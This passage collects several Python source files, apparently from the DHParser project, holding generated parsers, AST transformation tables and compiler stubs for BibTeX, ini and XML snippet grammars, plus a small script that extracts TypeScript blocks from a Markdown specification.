Lookbehind, Lookahead, Alternative, Pop, Required, Text, Synonym, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, mixin_comment, compile_source, \
last_value, matching_bracket, PreprocessorFunc, \
Node, TransformationDict, Whitespace, \
traverse, remove_children_if, is_anonymous, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
remove_empty, remove_tokens, flatten, \
is_empty, collapse, remove_children, remove_content, remove_brackets, change_tag_name, \
keep_children, is_one_of, has_content, apply_if, \
WHITESPACE_PTYPE, TOKEN_PTYPE, THREAD_LOCALS
from DHParser.transform import TransformationFunc
from DHParser.log import start_logging
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def BibTeXPreprocessor(text):
return text
def get_preprocessor() -> PreprocessorFunc:
return BibTeXPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class BibTeXGrammar(Grammar):
r"""Parser for a BibTeX source file.
"""
text = Forward()
source_hash__ = "f070f9a8eaff76cdd1669dcb63d8b8f3"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r'(?i)%[^\n]*\n'
comment_rx__ = re.compile(COMMENT__)
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
EOF = NegativeLookahead(RegExp('(?i).'))
WS = Alternative(Series(Lookahead(RegExp('(?i)[ \\t]*%')), wsp__), RegExp('(?i)[ \\t]+'))
ESC = Series(Lookbehind(RegExp('(?i)\\\\')), RegExp('(?i)[%&_]'))
CONTENT_STRING = OneOrMore(Alternative(RegExp('(?i)[^{}%&_ \\t]+'), ESC, WS))
COMMA_TERMINATED_STRING = ZeroOrMore(Alternative(RegExp('(?i)[^,%&_ \\t]+'), ESC, WS))
NO_BLANK_STRING = Series(OneOrMore(Alternative(RegExp('(?i)[^ \\t\\n,%&_]+'), ESC)), wsp__)
WORD = Series(RegExp('(?i)\\w+'), wsp__)
text.set(ZeroOrMore(Alternative(CONTENT_STRING, Series(Series(Text("{"), wsp__), text, Series(Text("}"), wsp__)))))
plain_content = Synonym(COMMA_TERMINATED_STRING)
content = Alternative(Series(Series(Text("{"), wsp__), text, Series(Text("}"), wsp__)), plain_content)
field = Synonym(WORD)
key = Synonym(NO_BLANK_STRING)
type = Synonym(WORD)
entry = Series(RegExp('(?i)@'), type, Series(Text("{"), wsp__), key, ZeroOrMore(Series(Series(Text(","), wsp__), field, Series(Text("="), wsp__), content, mandatory=2)), Option(Series(Text(","), wsp__)), Series(Text("}"), wsp__), mandatory=6)
comment = Series(Series(Text("@Comment{"), wsp__), text, Series(Text("}"), wsp__), mandatory=2)
pre_code = ZeroOrMore(Alternative(RegExp('(?i)[^"%]+'), RegExp('(?i)%.*\\n')))
preamble = Series(Series(Text("@Preamble{"), wsp__), RegExp('(?i)"'), pre_code, RegExp('(?i)"'), wsp__, Series(Text("}"), wsp__), mandatory=5)
bibliography = Series(ZeroOrMore(Alternative(preamble, comment, entry)), wsp__, EOF)
root__ = bibliography
def get_grammar() -> BibTeXGrammar:
"""Returns a thread/process-exclusive BibTeXGrammar-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
grammar = THREAD_LOCALS.BibTeX_00000001_grammar_singleton
except AttributeError:
THREAD_LOCALS.BibTeX_00000001_grammar_singleton = BibTeXGrammar()
if hasattr(get_grammar, 'python_src__'):
THREAD_LOCALS.BibTeX_00000001_grammar_singleton.python_src__ = get_grammar.python_src__
grammar = THREAD_LOCALS.BibTeX_00000001_grammar_singleton
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
return grammar
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
BibTeX_AST_transformation_table = {
# AST Transformations for the BibTeX-grammar
"<": remove_empty,
"bibliography": [],
"preamble": [],
"pre_code": [],
"comment": [],
"entry": [],
"type": [],
"key": [],
"field": [],
"content": [replace_or_reduce],
"plain_content": [],
"text": [],
":_Token, :_RE": reduce_single_child,
"*": replace_by_single_child
}
def BibTeXTransform() -> TransformationFunc:
return partial(traverse, processing_table=BibTeX_AST_transformation_table.copy())
def get_transformer() -> TransformationFunc:
global thread_local_BibTeX_transformer_singleton
try:
transformer = thread_local_BibTeX_transformer_singleton
except NameError:
thread_local_BibTeX_transformer_singleton = BibTeXTransform()
transformer = thread_local_BibTeX_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
class BibTeXCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a BibTeX source file.
"""
def on_bibliography(self, node):
return node
def on_preamble(self, node):
pass
def on_pre_code(self, node):
pass
def on_comment(self, node):
pass
def on_entry(self, node):
pass
def on_type(self, node):
pass
def on_key(self, node):
pass
def on_field(self, node):
pass
def on_content(self, node):
pass
def on_plain_content(self, node):
pass
def on_text(self, node):
pass
def get_compiler() -> BibTeXCompiler:
global thread_local_BibTeX_compiler_singleton
try:
compiler = thread_local_BibTeX_compiler_singleton
except NameError:
thread_local_BibTeX_compiler_singleton = BibTeXCompiler()
compiler = thread_local_BibTeX_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
start_logging("LOGS")
compiler = get_compiler()
cname = compiler.__class__.__name__
log_file_name = os.path.basename(os.path.splitext(source)[0]) \
if is_filename(source) < 0 else cname[:cname.find('.')] + '_out'
result = compile_source(source, get_preprocessor(),
get_grammar(),
get_transformer(), compiler)
return result
if __name__ == "__main__":
if len(sys.argv) > 1:
result, errors, ast = compile_src(sys.argv[1])
if errors:
for error in errors:
print(error)
sys.exit(1)
else:
print(result.as_xml() if isinstance(result, Node) else result)
else:
print("Usage: BibTeXParser.py [FILENAME]")
```
#### File: experimental/ini/iniParser.py
```python
import collections
from functools import partial
import os
import sys
from typing import Tuple, List, Union, Any, Optional, Callable
try:
scriptpath = os.path.dirname(__file__)
except NameError:
scriptpath = ''
dhparser_parentdir = os.path.abspath(os.path.join(scriptpath, '..', '..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparser_parentdir not in sys.path:
sys.path.append(dhparser_parentdir)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, AnyChar, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, Counted, Interleave, INFINITE, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, TreeReduction, \
ZeroOrMore, Forward, NegativeLookahead, Required, CombinedParser, mixin_comment, \
compile_source, grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, \
remove_if, Node, TransformationDict, TransformerCallable, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, all_of, any_of, \
merge_adjacent, collapse, collapse_children_if, transform_content, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
transform_content, replace_content_with, forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, node_maker, access_thread_locals, access_presets, PreprocessorResult, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, optional_last_value, insert, \
positions_of, replace_tag_names, add_attributes, delimit_children, merge_connected, \
has_attr, has_parent, ThreadLocalSingletonFactory, Error, canonical_error_strings, \
has_errors, ERROR, FATAL, set_preset_value, get_preset_value, NEVER_MATCH_PATTERN, \
gen_find_include_func, preprocess_includes, make_preprocessor, chain_preprocessors
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
RE_INCLUDE = NEVER_MATCH_PATTERN
# To capture includes, replace the NEVER_MATCH_PATTERN
# by a pattern with group "name" here, e.g. r'\input{(?P<name>.*)}'
def iniTokenizer(original_text) -> Tuple[str, List[Error]]:
# Here, a function body can be filled in that adds preprocessor tokens
# to the source code and returns the modified source.
return original_text, []
def preprocessor_factory() -> PreprocessorFunc:
# below, the second parameter must always be the same as iniGrammar.COMMENT__!
find_next_include = gen_find_include_func(RE_INCLUDE, '#.*')
include_prep = partial(preprocess_includes, find_next_include=find_next_include)
tokenizing_prep = make_preprocessor(iniTokenizer)
return chain_preprocessors(include_prep, tokenizing_prep)
get_preprocessor = ThreadLocalSingletonFactory(preprocessor_factory, ident=1)
def preprocess_ini(source):
return get_preprocessor()(source)
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class iniGrammar(Grammar):
r"""Parser for an ini source file.
"""
source_hash__ = "3c1c553d5d0e95aee47ffb654683f53b"
disposable__ = re.compile('EOF$|TEXTLINE$')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r'#.*'
comment_rx__ = re.compile(COMMENT__)
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = Drop(NegativeLookahead(RegExp('.')))
TEXTLINE = RegExp('[^"\\n]*')
value = Series(Drop(Text('"')), TEXTLINE, Series(Drop(Text('"')), dwsp__), mandatory=1)
identifier = Series(RegExp('\\w+'), dwsp__)
entry = Series(identifier, Series(Drop(Text(":")), dwsp__), value, mandatory=1)
heading = Series(Series(Drop(Text("[")), dwsp__), identifier, Series(Drop(Text("]")), dwsp__), mandatory=1)
section = Series(heading, ZeroOrMore(entry))
ini_file = Series(dwsp__, ZeroOrMore(section), EOF)
resume_rules__ = {'heading': [re.compile(r'\n\s*(?=\w|\[)')],
'entry': [re.compile(r'\n\s*(?=\w|\[)')]}
root__ = ini_file
_raw_grammar = ThreadLocalSingletonFactory(iniGrammar, ident=1)
def get_grammar() -> iniGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
try:
if not grammar.__class__.python_src__:
grammar.__class__.python_src__ = get_grammar.python_src__
except AttributeError:
pass
return grammar
def parse_ini(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
ini_AST_transformation_table = {
# AST Transformations for the ini-grammar
# "<": flatten
# "*": replace_by_single_child
# ">: []
"ini_file": [],
"section": [],
"heading": [],
"entry": [],
"identifier": [],
"value": [],
"TEXTLINE": [],
"EOF": [],
}
def iniTransformer() -> TransformerCallable:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=ini_AST_transformation_table.copy())
get_transformer = ThreadLocalSingletonFactory(iniTransformer, ident=1)
def transform_ini(cst):
return get_transformer()(cst)
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
class iniCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a ini source file.
"""
def __init__(self):
super(iniCompiler, self).__init__()
def reset(self):
super().reset()
# initialize your variables here, not in the constructor!
def on_ini_file(self, node):
return self.fallback_compiler(node)
# def on_section(self, node):
# return node
# def on_heading(self, node):
# return node
# def on_entry(self, node):
# return node
# def on_identifier(self, node):
# return node
# def on_value(self, node):
# return node
# def on_TEXTLINE(self, node):
# return node
# def on_EOF(self, node):
# return node
get_compiler = ThreadLocalSingletonFactory(iniCompiler, ident=1)
def compile_ini(ast):
return get_compiler()(ast)
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
RESULT_FILE_EXTENSION = ".sxpr" # Change this according to your needs!
def compile_src(source: str) -> Tuple[Any, List[Error]]:
"""Compiles ``source`` and returns (result, errors)."""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple[:2] # drop the AST at the end of the result tuple
def serialize_result(result: Any) -> Union[str, bytes]:
"""Serialization of result. REWRITE THIS, IF YOUR COMPILATION RESULT
IS NOT A TREE OF NODES.
"""
if isinstance(result, Node):
return result.serialize(how='default' if RESULT_FILE_EXTENSION != '.xml' else 'xml')
else:
return repr(result)
def process_file(source: str, result_filename: str = '') -> str:
"""Compiles the source and writes the serialized results back to disk,
unless any fatal errors have occurred. Error and Warning messages are
written to a file with the same name as `result_filename` with an
appended "_ERRORS.txt" or "_WARNINGS.txt" in place of the name's
extension. Returns the name of the error-messages file or an empty
string, if no errors of warnings occurred.
"""
source_filename = source if is_filename(source) else ''
result, errors = compile_src(source)
if not has_errors(errors, FATAL):
if os.path.abspath(source_filename) != os.path.abspath(result_filename):
with open(result_filename, 'w') as f:
f.write(serialize_result(result))
else:
errors.append(Error('Source and destination have the same name "%s"!'
% result_filename, 0, FATAL))
if errors:
err_ext = '_ERRORS.txt' if has_errors(errors, ERROR) else '_WARNINGS.txt'
err_filename = os.path.splitext(result_filename)[0] + err_ext
with open(err_filename, 'w') as f:
f.write('\n'.join(canonical_error_strings(errors)))
return err_filename
return ''
def batch_process(file_names: List[str], out_dir: str,
*, submit_func: Callable = None,
log_func: Callable = None) -> List[str]:
"""Compiles all files listed in filenames and writes the results and/or
error messages to the directory `our_dir`. Returns a list of error
messages files.
"""
error_list = []
def gen_dest_name(name):
return os.path.join(out_dir, os.path.splitext(os.path.basename(name))[0] \
+ RESULT_FILE_EXTENSION)
def run_batch(submit_func: Callable):
nonlocal error_list
err_futures = []
for name in file_names:
dest_name = gen_dest_name(name)
err_futures.append(submit_func(process_file, name, dest_name))
for file_name, err_future in zip(file_names, err_futures):
error_filename = err_future.result()
if log_func:
log_func('Compiling "%s"' % file_name)
if error_filename:
error_list.append(error_filename)
if submit_func is None:
import concurrent.futures
from DHParser.toolkit import instantiate_executor
with instantiate_executor(get_config_value('batch_processing_parallelization'),
concurrent.futures.ProcessPoolExecutor) as pool:
run_batch(pool.submit)
else:
run_batch(submit_func)
return error_list
if __name__ == "__main__":
# recompile grammar if needed
script_path = os.path.abspath(__file__)
if script_path.endswith('Parser.py'):
grammar_path = script_path.replace('Parser.py', '.ebnf')
else:
grammar_path = os.path.splitext(script_path)[0] + '.ebnf'
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path) and os.path.isfile(grammar_path):
if not recompile_grammar(grammar_path, script_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
from argparse import ArgumentParser
parser = ArgumentParser(description="Parses a ini-file and shows its syntax-tree.")
parser.add_argument('files', nargs='+')
parser.add_argument('-d', '--debug', action='store_const', const='debug',
help='Store debug information in LOGS subdirectory')
parser.add_argument('-x', '--xml', action='store_const', const='xml',
help='Store result as XML instead of S-expression')
parser.add_argument('-o', '--out', nargs=1, default=['out'],
help='Output directory for batch processing')
parser.add_argument('-v', '--verbose', action='store_const', const='verbose',
help='Verbose output')
parser.add_argument('--singlethread', action='store_const', const='singlethread',
help='Run batch jobs in a single thread (recommended only for debugging)')
args = parser.parse_args()
file_names, out, log_dir = args.files, args.out[0], ''
# if not os.path.exists(file_name):
# print('File "%s" not found!' % file_name)
# sys.exit(1)
# if not os.path.isfile(file_name):
# print('"%s" is not a file!' % file_name)
# sys.exit(1)
if args.debug is not None:
log_dir = 'LOGS'
access_presets()
set_preset_value('history_tracking', True)
set_preset_value('resume_notices', True)
set_preset_value('log_syntax_trees', frozenset(['cst', 'ast'])) # don't use a set literal, here!
finalize_presets()
start_logging(log_dir)
if args.singlethread:
set_config_value('batch_processing_parallelization', False)
if args.xml:
RESULT_FILE_EXTENSION = '.xml'
def echo(message: str):
if args.verbose:
print(message)
batch_processing = True
if len(file_names) == 1:
if os.path.isdir(file_names[0]):
dir_name = file_names[0]
echo('Processing all files in directory: ' + dir_name)
file_names = [os.path.join(dir_name, fn) for fn in os.listdir(dir_name)
if os.path.isfile(os.path.join(dir_name, fn))]
elif not ('-o' in sys.argv or '--out' in sys.argv):
batch_processing = False
if batch_processing:
if not os.path.exists(out):
os.mkdir(out)
elif not os.path.isdir(out):
print('Output directory "%s" exists and is not a directory!' % out)
sys.exit(1)
error_files = batch_process(file_names, out, log_func=print if args.verbose else None)
if error_files:
category = "ERRORS" if any(f.endswith('_ERRORS.txt') for f in error_files) \
else "warnings"
print("There have been %s! Please check files:" % category)
print('\n'.join(error_files))
if category == "ERRORS":
sys.exit(1)
else:
result, errors = compile_src(file_names[0])
if errors:
for err_str in canonical_error_strings(errors):
print(err_str)
if has_errors(errors, ERROR):
sys.exit(1)
print(result.serialize(how='default' if args.xml is None else 'xml')
if isinstance(result, Node) else result)
```
#### File: ts2dataclass/scripts/extract_ts_from_lsp.py
```python
def extract(source, dest):
with open(source, 'r', encoding='utf-8') as f:
src = f.read()
lines = src.split('\n')
ts = []
copy_flag = False
for l in lines:
if l.strip() == '```typescript':
copy_flag = True
elif l.strip() == '```':
copy_flag = False
ts.append('')
else:
if copy_flag:
ts.append(l)
with open(dest, 'w', encoding='utf-8') as f:
f.write('\n'.join(ts))
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
source = sys.argv[1]
else:
source = "lsp-specification_3.16.md"
i = source.rfind('.')
if i < 0:
i = len(source)
dest = source[:i] + '.ts'
extract(source, dest)
```
#### File: experimental/XMLSnippet/XMLSnippetParser.py
```python
import collections
from functools import partial
import os
import sys
dhparser_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../examples', '..'))
if dhparser_path not in sys.path:
sys.path.append(dhparser_path)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, Required, mixin_comment, compile_source, \
grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, remove_if, \
Node, TransformationFunc, TransformationDict, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, \
merge_adjacent, collapse, collapse_children_if, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, access_thread_locals, access_presets, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, ThreadLocalSingletonFactory
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def XMLSnippetPreprocessor(text):
return text, lambda i: i
def get_preprocessor() -> PreprocessorFunc:
return XMLSnippetPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class XMLSnippetGrammar(Grammar):
r"""Parser for a XMLSnippet source file.
"""
element = Forward()
source_hash__ = "ebb52cf647bba2d2f543c86dd3590dbe"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r''
comment_rx__ = RX_NEVER_MATCH
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = NegativeLookahead(RegExp('.'))
S = RegExp('\\s+')
Char = RegExp('\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]')
Chars = RegExp('(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF])+')
CharRef = Alternative(Series(Drop(Text('&#')), RegExp('[0-9]+'), Drop(Text(';'))), Series(Drop(Text('&#x')), RegExp('[0-9a-fA-F]+'), Drop(Text(';'))))
CommentChars = RegExp('(?:(?!-)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
PIChars = RegExp('(?:(?!\\?>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
IgnoreChars = RegExp('(?:(?!(?:<!\\[)|(?:\\]\\]>))(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CData = RegExp('(?:(?!\\]\\]>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CharData = RegExp('(?:(?!\\]\\]>)[^<&])+')
PubidChars = RegExp("(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])+")
PubidCharsSingleQuoted = RegExp('(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-()+,./:=?;!*#@$_%])+')
CDSect = Series(Drop(Text('<![CDATA[')), CData, Drop(Text(']]>')))
NameStartChar = RegExp('(?x)_|:|[A-Z]|[a-z]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF]')
NameChars = RegExp('(?x)(?:_|:|-|\\.|[A-Z]|[a-z]|[0-9]\n |\\u00B7|[\\u0300-\\u036F]|[\\u203F-\\u2040]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF])+')
Comment = Series(Drop(Text('<!--')), ZeroOrMore(Alternative(CommentChars, RegExp('-(?!-)'))), Drop(Text('-->')))
Name = Series(NameStartChar, Option(NameChars))
PITarget = Series(NegativeLookahead(RegExp('X|xM|mL|l')), Name)
PI = Series(Drop(Text('<?')), PITarget, Option(Series(dwsp__, PIChars)), Drop(Text('?>')))
Misc = OneOrMore(Alternative(Comment, PI, S))
Names = Series(Name, ZeroOrMore(Series(RegExp(' '), Name)))
Nmtoken = Synonym(NameChars)
Nmtokens = Series(Nmtoken, ZeroOrMore(Series(RegExp(' '), Nmtoken)))
PEReference = Series(Drop(Text('%')), Name, Drop(Text(';')))
EntityRef = Series(Drop(Text('&')), Name, Drop(Text(';')))
Reference = Alternative(EntityRef, CharRef)
PubidLiteral = Alternative(Series(Drop(Text('"')), Option(PubidChars), Drop(Text('"'))), Series(Drop(Text("\'")), Option(PubidCharsSingleQuoted), Drop(Text("\'"))))
SystemLiteral = Alternative(Series(Drop(Text('"')), RegExp('[^"]*'), Drop(Text('"'))), Series(Drop(Text("\'")), RegExp("[^']*"), Drop(Text("\'"))))
AttValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^<&"]+'), Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^<&']+"), Reference)), Drop(Text("\'"))))
EntityValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^%&"]+'), PEReference, Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^%&']+"), PEReference, Reference)), Drop(Text("\'"))))
content = Series(Option(CharData), ZeroOrMore(Series(Alternative(element, Reference, CDSect, PI, Comment), Option(CharData))))
Attribute = Series(Name, dwsp__, Drop(Text('=')), dwsp__, AttValue, mandatory=2)
TagName = Capture(Synonym(Name))
emptyElement = Series(Drop(Text('<')), Name, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('/>')))
ETag = Series(Drop(Text('</')), Pop(TagName), dwsp__, Drop(Text('>')), mandatory=1)
STag = Series(Drop(Text('<')), TagName, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('>')))
VersionNum = RegExp('[0-9]+\\.[0-9]+')
intSubset = RegExp('(?:(?!\\][^\\]])[^<&])+')
ExternalID = Series(Drop(Text('SYSTEM')), S, SystemLiteral, mandatory=1)
doctypedecl = Series(Drop(Text('<!DOCTYPE')), dwsp__, Name, Option(Series(dwsp__, ExternalID)), dwsp__, Option(Series(Drop(Text('[')), intSubset, Drop(Text(']')), dwsp__)), Drop(Text('>')))
No = Text('no')
Yes = Text('yes')
SDDecl = Series(dwsp__, Drop(Text('standalone')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Alternative(Series(Drop(Text("\'")), Yes), Series(No, Drop(Text("\'")))), Alternative(Series(Drop(Text('"')), Yes), Series(No, Drop(Text('"'))))))
EncName = RegExp('[A-Za-z][A-Za-z0-9._\\-]*')
EncodingDecl = Series(dwsp__, Drop(Text('encoding')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), EncName, Drop(Text("\'"))), Series(Drop(Text('"')), EncName, Drop(Text('"')))))
VersionInfo = Series(dwsp__, Drop(Text('version')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), VersionNum, Drop(Text("\'"))), Series(Drop(Text('"')), VersionNum, Drop(Text('"')))))
XMLDecl = Series(Drop(Text('<?xml')), VersionInfo, Option(EncodingDecl), Option(SDDecl), dwsp__, Drop(Text('?>')))
prolog = Series(Option(Series(dwsp__, XMLDecl)), Option(Misc), Option(Series(doctypedecl, Option(Misc))))
element.set(Alternative(emptyElement, Series(STag, content, ETag, mandatory=1)))
document = Series(prolog, element, Option(Misc), EOF)
root__ = document
_raw_grammar = ThreadLocalSingletonFactory(XMLSnippetGrammar, ident=1)
def get_grammar() -> XMLSnippetGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
return grammar
def parse_XMLSnippet(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
XMLSnippet_AST_transformation_table = {
# AST Transformations for the XMLSnippet-grammar
"<": flatten,
"document": [],
"prolog": [],
"XMLDecl": [],
"VersionInfo": [],
"VersionNum": [],
"EncodingDecl": [],
"EncName": [],
"SDDecl": [],
"Yes": [],
"No": [],
"doctypedecl": [],
"ExternalID": [],
"intSubset": [],
"element": [replace_or_reduce],
"STag": [],
"ETag": [],
"emptyElement": [],
"TagName": [],
"Attribute": [],
"content": [],
"EntityValue": [replace_or_reduce],
"AttValue": [replace_or_reduce],
"SystemLiteral": [replace_or_reduce],
"PubidLiteral": [replace_or_reduce],
"Reference": [replace_or_reduce],
"EntityRef": [],
"PEReference": [],
"Nmtokens": [],
"Nmtoken": [reduce_single_child],
"Names": [],
"Name": [],
"NameStartChar": [],
"NameChars": [],
"Misc": [],
"Comment": [],
"PI": [],
"PITarget": [],
"CDSect": [],
"PubidCharsSingleQuoted": [],
"PubidChars": [],
"CharData": [],
"CData": [],
"IgnoreChars": [],
"PIChars": [],
"CommentChars": [],
"CharRef": [replace_or_reduce],
"Chars": [],
"Char": [],
"S": [],
"EOF": [],
":Text": reduce_single_child,
"*": replace_by_single_child
}
def CreateXMLSnippetTransformer() -> TransformationFunc:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=XMLSnippet_AST_transformation_table.copy())
def get_transformer() -> TransformationFunc:
"""Returns a thread/process-exclusive transformation function."""
THREAD_LOCALS = access_thread_locals()
try:
transformer = THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton
except AttributeError:
THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton = CreateXMLSnippetTransformer()
transformer = THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
